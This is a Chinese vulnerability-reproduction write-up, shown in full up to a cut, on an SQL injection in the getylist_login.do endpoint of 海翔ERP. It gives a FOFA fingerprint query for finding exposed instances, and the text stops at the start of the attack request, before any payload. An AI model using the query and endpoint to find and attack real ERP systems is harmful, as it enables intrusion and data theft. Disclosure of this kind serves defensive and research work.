@[toc]

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 海翔ERP 简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

海翔ERP

2.漏洞描述

海翔ERP为企业提供 营销 + 财务 + 仓储 + 物流 整体解决方案。 云ERP致力于在互联网背景下，为商贸公司提供企业级整体应用解决方案。云ERP更注重提供丰富的移动端应用，推动企业在互联网时代的经营升级。云ERP采用先进的web技术构架，为企业提供稳定、高效的云saas服务，支持pc、手机、平板、pda等多终端访问。产品版本涵盖 批发、连锁、零售、单体 等多种业务模式，充分满足企业目前以及未来的发展需要。,海翔ERP getylist_login.do接口存在sql注入漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

海翔ERP

海翔ERP getylist_login.do接口存在sql注入漏洞

4.fofa查询语句

body="checkMacWaitingSecond"

5.漏洞复现

漏洞链接：http://127.0.0.1/getylist_login.do

漏洞数据包：

POST /getylist_l